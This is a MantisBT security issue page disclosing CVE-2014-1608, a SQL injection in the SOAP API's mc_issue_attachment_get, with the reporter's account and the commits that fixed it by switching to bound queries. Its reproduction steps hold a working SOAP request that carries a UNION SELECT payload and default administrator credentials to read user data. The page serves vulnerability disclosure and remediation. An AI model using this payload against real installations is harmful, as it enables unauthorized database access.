View Issue Details

IDProjectCategoryView StatusLast Update
0016879mantisbtsecuritypublic2014-02-07 18:24
Reporterdregad Assigned Todregad  
PriorityimmediateSeveritymajorReproducibilityhave not tried
Status closedResolutionfixed 
Product Version1.1.0a4 
Target Version1.2.16Fixed in Version1.2.16 
Summary0016879: CVE-2014-1608: soap:Envelope SQL injection attack
Description

The SOAP API can be used for SQL injection attacks.

Pasting relevant extracts of the original e-mail report below


The xml sent to the soap webservice is sometimes validated, sometimes not. This
is independend from the php.ini and seems to be dependent on the php binary.
The php binaries on the different systems (I used the thoughtpolice images)
differ in the libxml2 version. But I am not quite sure this is the reason.

It is definitely still an issue, but it's not 100% sure whether the
responsibility is 100% at mantisbt.org

the XML request cannot be issued without a user account. The request allows
to read the contents of the entire mantis database no matter what the user's
access permissions are. Mantis often is used with many projects and has a
fine-grain permission structure.

Steps To Reproduce

If you would like to reproduce the issue, you could issue the following
request to a current mantis system (1.2.15) mybe on a recent CentOS image
from thoughtpolice (http://sourceforge.net/projects/thoughtpolicevm/). This
example uses the administrator account, because it is enabled by default...

<?xml version="1.0" encoding="utf-8"?><soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance&quot;
xmlns:xsd="http://www.w3.org/2001/XMLSchema&quot;
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/&quot;>&lt;soap:Body>&lt;mc_issue_attachment_get
xmlns="http://futureware.biz/mantisconnect&quot;>&lt;username>administrator&lt;/username>&lt;password>root&lt;/password>&lt;issue_attachment_id>'
UNION SELECT 927,3358,1337,313373,1,1,1,1,1,username,23,42 FROM
mantis_user_table WHERE mantis_user_table.id=1 ORDER BY
bug_id,'true</issue_attachment_id></mc_issue_attachment_get></soap:Body></soap:Envelope>

This request selects the username from mantis_user_table with id=1. The
output is base64-encoded.

Additional Information

This issue was initially discovered and reported by e-mail by Andrea Barisani from oCERT, on behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security researcher at n.runs professionals GmbH (https://www.nruns.com), who discovered the issue during an audit at a customer's site on an up-to-date machine with the latest Mantis version (1.2.15).

TagsNo tags attached.

Relationships

related to 0016880 closeddregad CVE-2014-1609: SQL injection vulnerabilities 
related to 0016898 closeddregad Dropping deprecated database API function db_query() 

Activities

dregad

dregad

2014-01-24 10:28

developer   ~0039161

grangeway quickly identified the root cause and provided a fix for the issue [1]

[1] https://github.com/grangeway/mantisbt/commit/b930f0e44481439ca5bca6b438e55641d139f7e2

Related Changesets

MantisBT: master-1.2.x 00b4c170

2014-01-17 11:24

Paul Richards

Committer: dregad


Details Diff
Fix CVE-2014-1608: mc_issue_attachment_get SQL injection

Use of db_query() instead of db_query_bound() allowed SQL injection
attacks due to unsanitized use of parameters within the query when using
the SOAP API mc_issue_attachment_get.

This issue was reported by e-mail by Andrea Barisani from oCERT, on
behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security
researcher at n.runs professionals GmbH, who discovered the issue
during an audit at a customer's site.

Fixes 0016879

Signed-off-by: Damien Regad <dregad@mantisbt.org>

Conflicts:
api/soap/mc_file_api.php
Affected Issues
0016879
mod - api/soap/mc_file_api.php Diff File

MantisBT: master 3be86ce3

2014-01-17 11:24

Paul Richards

Committer: dregad


Details Diff
Fix CVE-2014-1608: mc_issue_attachment_get SQL injection

Use of db_query() instead of db_query_bound() allowed SQL injection
attacks due to unsanitized use of parameters within the query when using
the SOAP API mc_issue_attachment_get.

This issue was reported by e-mail by Andrea Barisani from oCERT, on
behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security
researcher at n.runs professionals GmbH, who discovered the issue
during an audit at a customer's site.

Fixes 0016879

Signed-off-by: Damien Regad <dregad@mantisbt.org>
Affected Issues
0016879
mod - api/soap/mc_file_api.php Diff File